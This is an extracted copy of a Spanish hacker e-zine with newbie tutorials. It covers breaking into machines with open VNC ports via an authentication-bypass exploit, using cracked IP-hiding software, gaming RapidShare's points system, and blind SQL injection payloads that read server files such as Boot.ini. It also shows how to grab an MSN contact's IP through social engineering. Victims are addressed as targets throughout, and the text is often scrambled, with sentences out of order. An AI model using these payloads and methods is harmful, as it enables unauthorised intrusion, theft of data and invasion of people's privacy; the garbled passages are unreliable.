13214079 CUH Ezine 3 Edicion

download 13214079 CUH Ezine 3 Edicion

of 69

Transcript of 13214079 CUH Ezine 3 Edicion

  • !!

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

    !

  • Joejdf!

    1 PORTADA & APENDICE

    3 EXPLOTANDO PUERTOS

    6 CAMBIAR IP CON HIDEIP

    8 RAPIDSHARE PREMIUM

    10 INYECCION A CIEGAS

    13 UTILIDADES MSN

    17 CREAR Y ENCRIPTAR TROYANOS

    21 CONOCIMIENTO BASICO EXPLOITS

    23 INFECTAR FICHEROS EJECUTABLES

    26 APERTURA DE CARPETAS

    28 INTRODUCCION AL ASM II

    33 MANUAL DE BATCH

    38 PROGRAMACION C II

    42 TRIANGULO DE PASCAL

    44 PROGRAMAR EN ASP

    46 TABLA DE CODIGOS CARACTERES

    50 PENDRIVE USB DE ARRANQUE EN LINUX

    53 TUTORIAL BOTONES

    59 TUTO FIRMA

    60 SETUP BIOS CMOS

    62 INSTALACION DE ASTERISK

    66 MODDING GALLERY 3

    !

  • Hacking Newbie

    Explotando Puertos CUH e-zine 3 Edicion

    Explotando Puertos By [p3ll3]

    Explotando Puertos 5900 y 3899

    Antes de empezar el tutorial tenemos que informarnos un poco acerca de lo que vamos a hacer... En realidad este tutorial va a tratar de explicar como podemos controlar un pc remotamente con la ayuda de los administradores de las pc victimas. xD

    Que es control remoto ??? Bueno en este caso vamos a tener acceso a todas las funciones de la pc victima como si furamos administradores.

    Que es o que funcion cumplen los puertos que vamos a utilizar para poder tener control sobre ella ??? Los puertos mencionados arriba son los que utiliza el programa VNC para poder conectarse remotamente

    Y el puerto 3899 es el utilizado po

    a la pc (en realidad solo el 5900).

    r windows para el

    ara poder realizar la intrusin necesitamos lo

    Un scanner de puertos. (propio o el que

    El scanner de VNC (para windows solamente,

    En linux solo necesitamos el Krfb que esta

    Y sobre todo mucha paciencia. Como conocemos una victima ??

    uy fcil yo creo que ya hasta ustedes lo saben;

    map -P0 -p T:3899,5900

    RDP que cumple la misma funcin del VNC. Psiguiente:

    recomendara es Nmap)

    google: BoztecVNC scanner), eso si no se quieren complicar la vida.

    pre-instalado, por lo menos en Slackware en la parte de los programas de Internet.

    re

    Mpara saber si una victima es o no vulnerable simplemente aplicamos el siguiente comando, esto utilizando Nmap: n

    es lo que hace?? ste comando fue escogido porque va a hacer un

    para decirle al scanner que

    ste comando nos va a devolver el siguiente

    Porque este comando y que

    Eescaneo sencillo a esa ip y a esos puertos. -P0 => hace el escaneo a fuerza. -p => especifico puertos T: => va junto a -p y es son puertos TCP. Eresultado:

  • Hacking Newbie

    Explotando Puertos CUH e-zine 3 Edicion

    Como vemos en la imagen nuestra victima cuenta

    mucha explicacin ahora como

    ienes dos opciones para entrar a la pc, la fcil y la

    con muchos puertos abiertos que pueden ser tomados como vulnerabilidades pero lo que nos interesa son las que ya he mencionado antes. Bueno,bueno, ya hago para entrar en el pc ??? Ttodava mas fcil ,xD .

    n linux podemos utilizar Krfb, la forma para entrar

    Como entro entonces?? Eseria entonces:

    n este caso parece que esta protegido el VNC pero

    loit:

    para

    Ayuda de Nmap

    E

    no se preocupen que eso se puede solucionar... Para poder loguearse remotamente esta el exprealvnc_41_bypass , con la ayuda de este exploit se van a loguear sin necesidad de passwords. -Con windows solamente utilizan el scannerVNC que mencione anteriormente y lograran loguearse (si tiene clave utilizan el mismo exploit), este scanner trae otras utilidades bastante buenas que pueden hacer uso en caso de que no tenga esos puertos vulnerables.

    Some Common Scan Ty oot privileges) pes (* options require r* -sS TCP SYN stealth port scan (default if privileged (root)) -sT TCP connect() port scan (default for unprivileged users) * -sU UDP port scan -sP ping scan (Find any reachable machines) * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only) -sV Version scan probes open ports determining service & app names/versions -sR RPC scan (use with other scan types) Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system -p ports to scan. Example range: 1-1024,1080,6666,31337 -F Only scans ports listed in nmap-services -v Verbose. Its use is recommended. Use twice for greater effect. -P0 Dont ping hosts (needed to scan www.microsoft.com and others) * -Ddecoy_host1,decoy2[,> Hide scan using many decoys -6 scans via IPv6 rather than IPv4 -T General timing policy -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve> -oN/-oX/-oG Output normal/XML/grepable scan logs to -iL Get targets from file; Use - for stdin * -S /-e Specify source address or network interface interactive Go into interactive mode (then press h for help) Example: nmap -v -sS -O www.my.com 192.168.0.0/16 192.88-90.*.*

    ueno por ahora eso fue todo, espero que les haya

    Saludos

    Bservido el tutorial y que este les haya enseado o por lo menos los haya motivado a buscar formas de como mejorar esto que acaban de leer.

    [p3ll3]

  • Hacking Newbie

    Cambiar IP CUH e-zine 3 Edicion

    Cambiar IP con HideIP By ChUtOReCaRgAdO

    Primeramente me presentare, Hola, para los que no me conocen soy Jos pero ms conocido como ChUtOReCaRgAdO y espero que te guste este pequeo aporte que he

    hecho. Aprende cambiar tus IP y crear un reseteador

    de estas (siendo dinmicas o Esttica) En este manual Tratare de ensear a usar el Hide IP Platinum, para que lo puedan usar bien y configurarlo de tal manera que les pueda servir de algo, para los que no saben este soft te cambia tu IP o la oculta. Tambin a crear una reseteador IP dinmicas para que no tengas hacer nada ms que apretar un .bat para que tu Ip cambie (solo para IPs dinmicas), Conceptos que debemos saber: IP: (Internet Protocol) es un conjunto de cuatro nmeros cada uno de ellos va desde el 0 al 255, separados por puntos, con los cuales se identifica a un ordenador conectado a una red que corre bajo este protocolo.

    Nuestra IP puede ser:

    IP Esttica (si siempre es la misma) El IP Platinum es especialmente para aquellos que no tienen IP Dinmica (por que cambiar la IP siendo esta es muy fcil) o simplemente si quieres ser annimo navegando por la web.

    IP dinmica (si cuando reiniciamos la conexin cambia). O sea si apagamos el modem o desconectamos el cable Ethernet y luego lo conectamos, nuestra IP Tericamente cambia.

    1. Empezare por ensear a cambiar tu IP (especial para IP) esttica:

    Para esto Ocuparemos Hide IP Platinum Bueno para los que no saben el Hide IP-Platinum es para cambiar la IP. De modo que te asigna una IP diferente, esto es muy til ya que puedes navegar libremente por la red siendo annimo y lo mas bueno de este soft sirve para evadir la espera en rapishare.com ya que al cambiarte la IP la base de datos de esta Web (rapidshrare.com) no te reconoce, y te dar acceso directo a la descarga del archivo que quieres ahorrndote la largusima espera de este.

    Requerimientos del Sistema:

    Windows 98/2000/XP/2003/Me 64 Megabyte Memoria 300 MHz CPU

    Lo primero que tenemos que hacer es descargar el soft que lo puedes hacer de aqu http://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exe Pass: chue-zine O lo puedes buscar en el Google escribiendo esta frase (que siempre funciona) Hide IP Platinum+ Crack y lo descargas, una vez que esta lista la descarga lo descomprimes en una carpeta (seguramente tendr dos archivos, el Programa y uno de texto que es el cdigo de activacin) una vez que ya tengas listo ejecutas el archivo .exe

    Le das en siguiente, aceptar, siguiente, siguiente, siguiente, Install, finish.

    Si todo sali bien, ya estar el soft listo para ser usado, una vez que ejecutes el Soft te saldr esta ventana

    Tienes que darle en esta opcin, e ingresas el cdigo que est en archivo anteriormente nombrado (el de texto que viene con el programa, ese que est en la carpeta) una vez insertado el cdigo apretas en Ok y listo, Aparecer un Icono en la barra de tareas

  • Hacking Newbie

    Cambiar IP CUH e-zine 3 Edicion

    Esto significa que el programa se est poniendo al da (actualizando) en este momento no debes hacer nada con l. Una vez que se ha actualiza en soft buscara en el proxy, una IP y te la dir

    Si te sale esto es que todo resulto bien, tu IP ha sido cambiada

    Si sale este Icono es que el IP-platiniun no ha encontrado ningn servidor y lo mejor es cambiar el proxy, mas adelante te enseare a cambiarlo. Pero primero cmbiale el Lenguaje haciendo doble click en el icono de la barra de tareas te vas a idioma le pones espaol y dejas tal cual las funciones que trae. Ahora explicare algunas de las funciones ms importantes que trae este soft:

    Esta opcin sale al hacer click con el botn izquierdo del mouse sobre el Icono de la barra de tareas de dicho soft. Stop Hide IP/Hide IP: Es para detener el Hide temporalmente, tambin lo puedes hacer con las teclas Ctrl+W. Change Proxy: sirve para cambiar el Proxy o sea la IP. Tambin se puede hacer Ctrl + Q. My IP: abre una pg. web , en esta te muestra tu IP actual .Ctrl+D Exit: Cierra el programa. Algunas Recomendaciones: Si se demora demasiado en encontrar una IP puedes cambiar el Proxy ej. A http://rapidshare.com Y en la cadena de caracteres tienes que poner una palabra como ej. Rapidshare.

    Pero si quieres puedes poner el que te apetezca. Pero cuidado si no sabes que poner, mejor deja todo como esta porque si est mal el proxy el software no funcionar. Si quieres bajar un archivo de http://rapishare.com y al cambiar la IP no puedes descargar el archivo tienes que presionar Ctrl+Q y buscara otra IP Y vas probando si te funciona en http://rapishare.com, hasta que encuentres una que puedas descargar al tiro pero tambin tienes que ir actualizando la pg. (F5).

    Ahora les enseare a crear un reseteador de IP dinmicas: Cuando tenemos IP dinmica, significa que cada vez que conectamos la internet, nos entrega una IP nueva, pero para hacer esto, hay que reiniciar el Equipo o sacar el cable que conecta la Internet, o apagar el Modem, que es un jaleo enorme, Si lo que quieres es apretar un botn y que se reinicie la conexin a Internet y te cambie la IP sigue leyendo, ya que enseare a hacer un soft (es muy simple) pero que es muy til , tenemos que abrir una hoja del block de notas o cualquier editor de texto plano y escribimos lo siguiente: @echo off Ipconfig/flushdns Ipconfig/release Ipconfig/renew Ipconfig /release *Con* Exit Lo guardamos en el escritorio, y le ponemos el nombre que nosotros queramos pero con extensin .bat, listo ya est hecho el reseteador de IP dinmicas. Fcil No?

    Saludos, hasta la prxima.

  • Hacking Newbie

    Cuenta Premium En RapidShare CUH e-zine 3 Edicion

    Crear una cuenta Premium En RapidShare By ChUtOReCaRgAdO

    COMO CREAR UNA CUENTA

    PREMIUM O EXTENDER UNA SI YA LA TIENES EN RAPIDSHARE.COM Perdn por que no lo haba dado a conocer directamente al foro ya que

    quera algo bueno en mi primer artculo en la Cuh e-Zine (pero luego lo subo al foro).

    ES VERDAD!, como dice el titulo en las prximas lneas te enseare como crear una cuenta (sin gastar ningn dinero) en este servidor de gestin de descarga y como todos saben es uno de los mejores y yo dira el mejor ya que es muy rpido (es porque tiene un acelerador de descarga muy bueno) y que las mejores cosas estn alli, como los SOs No libres, software de calidad (muchos), Msica, pelculas y etc. y etc. Pero lo malo de esto es cuando No tienes una cuenta Premium ya que tienes que esperarte varias horas para volver a bajarte un archivo (si es que bajaste algo de 100 Mb, adems es lo mximo que puedes descargar con cuenta free, por que cuando uno baja Free solo puede descargar algo igual o menor a 100 Mb) pero si tienes una cuenta Premium bajas todo quieras, tener varias descargas simultneas, no esperar, sin virus, etc. Pero tambin lo puedes utilizar para compartir archivos pesados con amigos, familiares, no es para que siempre rompamos las reglas de copy-restrinjido. Aunque hay varis programas que tratan de evadir cambiando la IP (que es el mtodo ms que se usa) lo mejor es tener una Cuenta Premium. Ya basta de palabrera y vamos al grano. Para poder hacer nuestra cuenta necesitamos este software Easy Rapidshare Points 3.0. Este con este software haremos lo siguiente (yo hasta esta parte iba muy emocionado por qu me imaginaba otra cosa pero sigue y el premio es grande) Miren lo que hace el Easy Rapidshare Points 3.0 es ayudarte a hacer puntos, si bien sabes t puedes ir subiendo cosas a esta web (Rapidshare.com) y llevar un registro de cuantas veces se ha descargado (pero tienes que tener cuenta Free o Premium) y te van dando un punto por cada vez que descarguen un archivo que t has subido (pero con la cuenta Premium o free). Y para

    que nos hagamos una Premium (de un AO) o extender la que ya tenis, hay que acumular 8000 Puntos (hartos verdad) pero con todos estos puntos te dan un ao de cuenta Premium. Lo primero que debemos hacer es bajarte este soft de http://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exe Pass:chue-zine O tal vez cuando leas esto el link este roto o tal vez la versin vaya en otra ms que la 3.0, bueno no te aflijas, te vas al Google y pones la frase mgica que a m siempre me funciona Easy Rapidshare Points (versin que buscas)+ crack . Una vez que lo descargas lo desempaquetas si bajaste mi archivo claro, ya que lo hice un .exe para que no necesites software adicionales para descomprimirlo un ejemplo es WinRar (debera estar el soft y un archivo de texto) si ests listo para instalarlo ejecutas el .exe, si sabes Ingles Lees , pero si no, No leas, pero dice algo sobre que cierres los programas que tienes y ejecucin y bla, bla, lo mismo que dicen todos y que nunca hago caso, he igual funcionan, apretar Next (siguiente). En esta parte Tienes que llenarlo con algunos datos y donde dice serial tienes que poner uno de los tantos que hay en el archivo de texto que vienes con el paquete que descargaste (recuerdas?). Siguiente, eliges donde quieres Instalarlo, siguiente, siguiente. Listo el programa est instalado, una vez instalado no lo ocuparemos al tiro. Ahora tenemos que hacer un archivo que pese ms De 1 mega y menos de 2 Mb, lo comprimimos (recomendado), si ya tienes una cuenta Premium seguramente sabes subir archivos, entonces lo subes, pero si no tienes una Cuenta Premium debes hacerte una Free (libre), si no sabes hacerte una sigue leyendo pero si sabes sltate estas estrofas. Hacerse una cuenta Free en Rapidshare: Abres una pg. web (con el Mozilla Firefox, Internet Explorer, Opera, tu elije el que ms te acomode) Nos vamos a: http://rapidshare.com subes el archivo que hemos creado anteriormente, para hacer esto de debes marcar donde dice examine, buscas el archivo que hemos hecho antes y aceptar, luego selecciona unload, esperas que se suba el archivo (el tiempo de espera vara segn la velocidad de conexin que tengas) . Una vez que se termine de subir te saldrn los datos; cual es el link, si quieres enviarle el link a amigos,

  • Hacking Newbie

    Cuenta Premium En RapidShare CUH e-zine 3 Edicion pero para que nos gamos una cuenta Free tienes que irte al final de la pg. y rellenar con tus datos donde dice user name (pones un nombre de usuario para registrarte ej. ChUtOReCaRgAdO, Email tienes que poner tu email verdadero y en password una contrasea y aceptas. Si esta todo correcto y te sale una pg. Como la de a continuacin, ya tienes tu cuenta Free, pero si no, es que algo quedo mal, vuelve a escribir tu nombre de usuario o contrasea.

    Escribimos los datos que hemos puesto anteriormente, tu nombre de usuario y contrasea y apretar Enter o donde dice SSL-encrypted Login , si est bien ya estarn dentro de tu cuenta free la pg. que muestra es diferente a la antes ya que ahora sale lo mismo para subir archivos pero abajo sale una lista de los archivos que has subido con la cuenta, ahora tienes que copiar el link del archivo que subimos anteriormente, tienes que llevar el cursor donde aparece un icono de archivo de texto y luego presionas el botn izquierdo del mouse y copias el link (copiar destino), ahora tenemos que abrir el Rapidshare Points, Inicio, todos los programas, Easy Rapidshare Points 3.0, y lo abres, copias el link en la barra de direcciones y apresta Go, entraremos a Rapidshare, tienes que bajarte el archivo, te vas al final de la pg. marcas donde dice Free, luego te vas al medio de la pg. y esperas un minuto, pones Las letras que aparecen y lo descargas, pero la gracia esta que cuando valla en la mitad o un poco mas all cancelas la descarga, luego repites el proceso una y otra vez.

    Es recomendable hacerlo entre hartas personas ya que se avanza mucho ms rpido.

    En 1 Minuto 1 punto 30 Minutos 30 puntos 1 Hora 60 puntos 1 da 1440 puntos 1 Mes 43.200

    PD: yo hace un mes que lo estoy intentando hacerme una, pero para m es muy difcil ya que no tengo internet y tengo que ir a un ciber. Para ver los puntos que llevas tienes que ingresar a tu cuenta a Rapidshare para ver cuntas veces se ha bajado el archivo. Te metes a la Web y te vas a la seccin Free Zone, y te metes en el sub-men Collector`s zone login, metes tu nombre de usuario y contrasea y listo. Tambin aconsejo otro soft que les puede servir ya que puede hacer varias descargas simultneas, el Downlop Direct, tienes que instalarlo y aplicarle el crack, luego lo abres :

    Y para empezar a descargar presiones donde dice y copias el link pero este a veces lo identifica solo, y comienza a descargar, luego haces lo mismo hasta que ya no se puede poner ninguna descarga, y cuando vallan en la mitad, lo cancelas o remueves uno o todos, y as vas avanzando harto, pero el archivo tiene que estar en .Zip o .rar, y este soft consume muchos recursos, si queremos encontrar el programa que menciono nos vamos al Google y ponemos Download Direct+crack SaLuDos y hasta la prxima

    By ChUtOReCaRgAdO

  • Hacking Newbie

    Inyeccion a ciegas SQL CUH e-zine 3 Edicion

    INYECCION A CIEGAS DE SQL I PARTE By Alesteir

    INYECCION A CIEGAS DE SQL -BLIND SQL INJECTION

    Para nadie es un secreto que unas de las mayores vulnerabilidades de

    la red son las famosas inyecciones SQL, pero existen variadas tcnicas y una de ellas, es la que actualmente se conoce como inyeccin a ciegas de SQL (blind sql injection), este articulo es una corta introduccin y nos ayudara a comprender lo que son y como funcionan dichas tcnicas y alguna cosilla mas, en el siguiente numero del e-zine trataremos la forma de explotar dichas vulnerabilidades.

    Inyeccin SQL

    Una inyeccin de cdigo SQL esta basada en una interaccin de un intruso con el motor de una base de datos, en la cual el atacante puede obtener y hasta modificar los datos, e incluso el atacante puede llegar a obtener y manipular archivos, con la consecuencia de poder manejar los datos y el sistema a su antojo y con total libertad. Todo ello se debe a la mala validacin y filtrado de los datos introducidos por el usuario (Cliente), por parte de la aplicacin Web (Servidor) que maneja el gestor de la base de datos, de forma que el intruso puede alterar las sentencias SQL aceptadas por la aplicacin server. Injeccion Ciega de SQL Esta tcnica se usa cuando una web no muestra los tpicos mensajes de error de la base de datos, al no haber un resultado positivo en una consulta especifica, o sea que solo se enviar una respuesta por parte del servidor si el resultado es correcto. Es por ello que sentencias que contengan entre sus condiciones valores comparativos como 1=1 o 0=1 ofrecen respuestas, bien sea respuestas negativas o positivas, esta es la base de esta tcnica

    de inyeccin SQL. Ahora Supongamos que tenemos una aplicacin web, la cual usa los datos que recibe por parte del usuario (Cliente) para construir sentencias de consulta y de esta forma mostrar la informacin pertinente (solicitando los datos al Servidor), ahora resulta que llegado el punto, sabemos de su vulnerabilidad y procedemos a inyectar consultas pero no vemos los datos obtenidos, no obstante, podemos distinguir comportamientos distintos entre consultas que muestran datos, y las que no lo hacen, es all donde basados en valores verdadero (true) o falso (false) que son devueltos por la aplicacin, que debemos saber el tipo de inyeccin ciega pertinente, para de esta manera obtener los datos que deseamos poseer. Para saber si un parmetro es vulnerable a una inyeccin ciega de sql supongamos que tenemos una web, y la pagina 467, por decir algo un ejemplo: http://www.ejemplo.org/pagina.php?id=467 Entonces aadimos abs() de la siguiente manera: http://www.ejemplo.org/pagina.asp?idpagina=abs(467) Y si la pgina se muestra correctamente sabremos que la web es vulnerable a un ataque a ciegas de inyeccin SQL.

  • Hacking Newbie

    Inyeccion a ciegas SQL CUH e-zine 3 Edicion Inyeccion a ciegas basado en tiempos de respuesta Las primeras referencias en cuanto al tema las hizo Chrish Anley en el documento: Advanced SQL Injection en el 2002 hacia referencia de la posibilidad de realizar ataques a ciegas basado en tiempos de respuesta , en dicho documento el explicaba cdigos, mtodos y practicas para hacer consultas sin importar si obtenamos resultados palpables, e indefectiblemente saber si eran ciertas o no, todo ello dependiendo, de el tiempo en que el motor de la base de datos tardaba en dar la respectiva respuesta a la consulta. A partir de all se empez a indagar por parte de otras mentes inquietas, pronto se descubrieron parmetros vulnerables a inyeccin SQL, de forma que sin necesidad de ver los resultados de la consulta, se podan conseguir resultados a partir del tiempo de respuesta dado por el gestor (y con un poco de lgica se podan transforman en datos reales), otros mas osados crearon herramientas para explotar (exploits) dichos parmetros vulnerables a inyecciones ciegas y hasta que con el tiempo se volvi ya todo un tpico, a la hora de penetrar un sistema basado en consultas a un gestor de base de datos. La tcnica consiste en generar retardos en las inyecciones, y la mejor forma de usar esta vulnerabilidad, es conociendo las funciones especificas cada motor de base de datos, benchmark (sleep en la versin 5 y posteriores) en mysqlm, waitfor en SQL server, DBMS_Lock.Sleep() en Oracle; por nombrar solo algunas. Veamos pues la forma de inyectar cdigo a ciegas en distintos gestores:

    Mysql_ http://server/ejemplo.php?id=35 and exists(select * from Passwords and benchmark(8000000,md5(rand()))=0 Mysql (versiones 5): http://server/ejemplo.asp?id=35 and exists(select * from Passwords) and sleep(8)

    Oracle: http://server/ejemplo.php?id=1; begin if (exists(select * from Passwords)) then dbms_lock.sleep(8); end if; end;

    Microsoft SQL Server : http://server/ejemplo.php?id=35; if (exists(select * from Passwords)) waitfor delay 0:0:8 En la anterior consulta el motor evala si la tabla Passwords existe y si contiene registros, al cumplirse la condicin la respuesta se retardar por un lapso de 8 segundos, es bueno recalcar que no todos los gestores permiten la tcnica de inyeccin a ciegas con retardo de tiempo Inyeccin a ciegas basado en tiempos de respuesta usando consultas pesadas Existe otra tcnica que se basa en usar consultas pesadas, las cuales al exigir al motor de bases de datos y de manera obvia generar un retardo de tiempo ante respuestas positivas. Supongamos que sabemos cual es el parmetro vulnerable de una consulta y queremos saber si existe una tabla X en especial, aqu optaramos por elaborar una consulta que solo haga trabajar al motor un tiempo extra con nuestra consulta pesada si dicha sentencia cumple la condicin de que la tabla X exista en la base de datos, de otra forma no lo hara y por lgica el tiempo de respuesta seria distinto, es aqu donde se deben conocer las clausulas y el tipo de condiciones que se pueden llegar a manejar, (tal como sucede con la clausula Where), para as mismo poder elaborar adecuadamente nuestro consulta , para ello se hace necesario conocer la evaluacin de las condiciones por parte de los gestores, en el caso de la clausula Where , si la clusula tiene encadenada sus condiciones por operadores de tipo OR la consulta se evaluar, mientras ninguna condicin devuelva un resultado verdadero, contrariamente cuando estn encadenadas por operadores de tipo AND las condiciones se evaluarn mientras ninguna devuelva un valor falso, basado en este mecanismo es que se optimiza el tiempo de respuesta para las condiciones, es por ello que los motores tienen un orden a la hora de hacer la evaluacin, pero es el programador quien realmente define el orden de las condiciones en una clausula Where, veamos por ejemplo la siguiente consulta: Select nombre from Passwords where nombre=Aleks and pass=qwerty; Select pass from Passwords where nombre=Aleks or pass=qwerty;

    En el primer caso usamos una condicin AND, si al evaluar la primera condicin obtenemos un valor

  • Hacking Newbie

    Inyeccion a ciegas SQL CUH e-zine 3 Edicion FALSO el gestor no evaluar la otra, en la segunda consulta con el operador OR si la primera condicin es VERDADERO no se evala la siguiente condicin. Sucede que no siempre es el gestor el que realiza la optimizacin, es entonces donde el programador debe saber la precedencia y el mismo efectuar la optimizacin, pudiendo ser de izquierda a derecha o viceversa. Actualmente los motores modernos estiman el tiempo de cada condicin y evalan primero la condicional de menos valor en tiempo real de ejecucin, esta particularidad es la que nos permite aprovecharnos de este tipo de situacin. Imaginemos que tenemos el parmetro vulnerable id_usuario en alguna URL: http://www.ejemplo.org/pagina.asp?id_Usuario=1 Con lo dicho anteriormente, si quisiramos saber si una tabla existe realizamos ms o menos la siguiente consulta: http://www.ejemplo.org/pagina.asp?id_Usuario=1 [nuestra consulta pesada] and exists (select * from Passwords) De lo anterior deducimos que si la tabla claves existe , nuestra consulta pesada se efectuara generando un retraso de tiempo considerable, lo cual nos revelar que efectivamente la tabla Passwords existe y que adems posee mas de un registro. La eleccin de nuestra consulta pesada ser la clave a la hora de saber el retardo y por ende saber si nuestra consulta ha sido efectiva. Entonces como elegimos nuestra consulta pesada? La respuesta se da conociendo las tablas internas para cada gestor de base de datos, por ejemplo en SQL Server tendramos sysobjects y en Access tendramos MSysObjects; o tablas propias de la web vulnerable, que por obvias razones nosotros seriamos quienes deduciramos aquellas tablas que contienen registros, de esta forma podemos medir los tiempos entre una consulta que cumpla las condiciones y una que no. Podemos generar consultas pesadas es unir tablas con otra s y otras hasta generar una cantidad grande de registros de forma que tan que obliguen al servidor a consumir un tiempo medible en procesarlo. Para ello basta con conocer o averiguar o adivinar una tabla del sistema de bases de datos, que tenga algn registro, y unirla consigo misma hasta generar un tiempo medible. Vamos a ver algunos ejemplos. Segn lo dicho anteriormente podemos hacer la siguiente consulta en la cual se invierte la condicin y as poder comparar los tiempos entre cada una de ellas: http://www.ejemplo.org/pagina.asp?id_Usuario=1 [nuestra consulta pesada] and not exists (select * from claves)

    Otras tcnicas de Blind SQL Injection

    De esta forma ya sabemos que podemos consultar a ciegas cada uno de los elementos del motor de una

    base de datos vulnerable, es lgico que dependiendo todo ello de los tipos de privilegios de la cuenta con que accedamos al servidor. Tambin existen otro tipo de tcnicas que nos permiten hacernos con archivos directamente del sistema operativo del servidor, con esto ya tenemos casi que un acceso total a la web. Existen distintas funciones en cada gestor por ejemplo en Microsoft SQL Server 2005 tenemos las funciones OpenRowset y BULK que se manejan combinadas, he aqu dos ejemplos :

    http://www.ejemplo.org/pagina.php?id=1 and (select datalength(Z) from OpenRowset(BULK 'c:\Boot.ini', SINGLE_CLOB) as t(Z)) >1

    http://www.ejemplo.org/pagina.php?id=1 and (select substring(Z,{PosByte},1) from OpenRowset(BULK 'c:\ Boot.ini', SINGLE_CLOB) as t(Z)) > 5

    Es asi como podramos automatizar el proceso y obtener todo el contenido del archivo con un cdigo que llame uno a uno los caracteres del archivo que vamos a conseguir.

    En MySQL podemos usar la funcin LOAD_FILE, la cual acepta como parmetro la ruta de el archivo pero en hexadecimal. Ahora si queremos realizar un ataque a el archivo c:Boot.ini debemos primero que todo convertirlo a hexadecimal: 0x633A5C626F6F742E696E69 con esto podemos proceder con la inyeccin:

    http://www.ejemplo.org/pagina.php?id=1 and mid(Load_File(0x633A5C626F6F742E696E69),1,1)=CHAR(34)

    La condicin ser positiva, si la primera letra del archivo corresponde con el carcter ASCII 34., es asi que por medio de automatizacin y de fuerza bruta podramos obtener todos los datos de un archivo, alginas herramientas se basan en este mtodo Para saber si una web es vulnerable a una inyeccin ciega de sql supongamos que tenemos una web, por decir algo un ejemplo: http://www.ejemplo.org/pagina.php?id=467 Entonces aadimos abs() de la siguiente manera: http://www.ejemplo.org/pagina.asp?idpagina=abs(467)

    Si la pgina se muestra correctamente sabremos que la web es vulnerable.

    Para la prxima edicion queda la otra parte de este articulo, espero que les guste! Suertes!!!

    By Alesteir

  • Hacking Newbie

    Utilidades MSN CUH e-zine 3 Edicion

    UTILIDADES MSN >By Ra19<

    UTILIDADES MSN

    Bueno en este manual basado para newbies, los cuales entran en el mundo de el hacking generalmente

    por este lado, por opinin personal no me gusta que en la mayora de los casos entren para estas cosas pero bueno, les hago un manual para que se puedan divertir un poco en lo que no saben usar y siempre les interes. Empezaremos por un encabezamiento en el cual se mostrara lo que leern a continuacin: 1.- Como sacar el IP de un contacto paso a paso, con diferentes mtodos. 2.- Congelar msn. 3.- Bloquear msn. 4.- Hackeo de msn las maneras menos complicadas para newbies. (Solo se darn pginas de inters sobre los temas ms fciles de conseguir un password, pero se explicara todo lo relacionado con lanzadores de exploits)

    Como sacar el IP de un contacto pas a paso, con diferentes mtodos. Bueno aqu solo se mostrara como sacar una IP, no detallare que es ni para que se usa tampoco, pero dejare 2 link de inters para los que se quieran informar bien, yo no escrib ninguna de esas 2 cosas y les doy los crditos a ellos. (cualquier duda foro.el-hacker.com lo mejor de lo mejor ;) ) 1 link sobre ip: http://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mx 2 link: http://foro.el-hacker.com/index.php/topic,43462.0.html#bot

    Solo bajen un poco y hay post sobre todo lo relacionado con un IP. Bueno empecemos, una de las maneras ms fciles sera esto. Abrimos el msn. Iniciamos sesin, etc. Abrimos la ventana de nuestra victima, en ese momento abrimos inicio>ejecutar>cmd se nos abre una ventana as:

    Despus a travs de ing. social, (deje link abajo para que aprendan lo que es por si acaso) le enviaremos algo:

    (Est en francs m SO pero eso no tiene importancia) Cuando el/ella acepte en el momento de la transferencia abrimos el MS/DOS (lo dicho mas arriba) y escribimos netstat n, el cual nos dar todas las conexiones establecidas que tiene el PC. (Se recomienda tener todo cerrado menos la ventana de la persona para tener menos conexiones y poder saber cual es) Generalmente hay mas de una IP hay que ir probando. Mtodo 2

    P Para esto se necesitan diferentes recursos en la PC. - Windows Live MSN - El PLUS de el Windows live MSN. - IP GET

  • Hacking Newbie

    Utilidades MSN CUH e-zine 3 Edicion Windows Live MSN link: http://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXE PLUS : http://download.msgpluslive.net/setup/MsgPlusLive-422.exe IPGET : http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108 Si los links caducan con el tiempo www.softonic.com y www.google.com los encuentran fcilmente Instalan todo, etc... Para ver el IP Get solo hay que ir a los scrips de MSN situados ac: En el momento de el envi abrimos el IP Get y nos saldr esto:

    Y listo tendremos el IP de el contacto =D Otros mtodos Bueno podra estar escribiendo mucho tiempo ya que hay muchos mtodos, dar algunos ejemplos IP CON HOTMAIL. Bueno simplemente hagan esto (est basado para Windows live Hotmail en el antiguo es mas fcil aun, si alguien quiere saber como se hace que busque en el todopoderoso Google) abajo estn los pasos a seguir. En otros tipos de correo como Yahoo, Gmail etc. no creo que sea muy diferente.

    En el punta de los cuadraditos de colores clickean y les sale eso

    Paso 1- Cambiar a versin completa de Windows Live Hotmail. Bueno abrimos la ventana de MSN de

    nuestra victima y le enviamos algo: Paso 2- Abrimos la bandeja de entrada y le damos clic derecho al mail al cual queramos saber el IP de quien lo envi Paso 3- Teniendo el clic derecho apretado, hacer clic en ver cdigo fuente y listo. Bueno tambin estn los IP por lanzadores de exploits troyanos etc... Pero no viene al tema. Para este capitulo le agradezco a todos los que postearon en el foro los diferentes links, y los post de los IP tambin, tambin pongo el link de ing. social dicho mas arriba Link: http://foro.el-hacker.com/index.php/topic,61858.0.html Post echo por Programar, yo aprend con ese post. Tambin se puede sacar la IP de alguien con acceso fsico al computador pero eso depende de cada uno. Sacar IP con acceso fsico con Internet es www.caulesmiip.com Sin Internet inicio>ejecutar>cmd>escribimos ipconfig Si no se puede poner Inicio>panel de control> conexiones Internet, escogen la conexin de Internet que estn usando, le dan al clic derecho entran a propiedades, van a soporte y esta el IP, si no simplemente con apretar con el clic derecho en la conexin abajo a la izquierda esta el IP. Congelar MSN.

  • Hacking Newbie

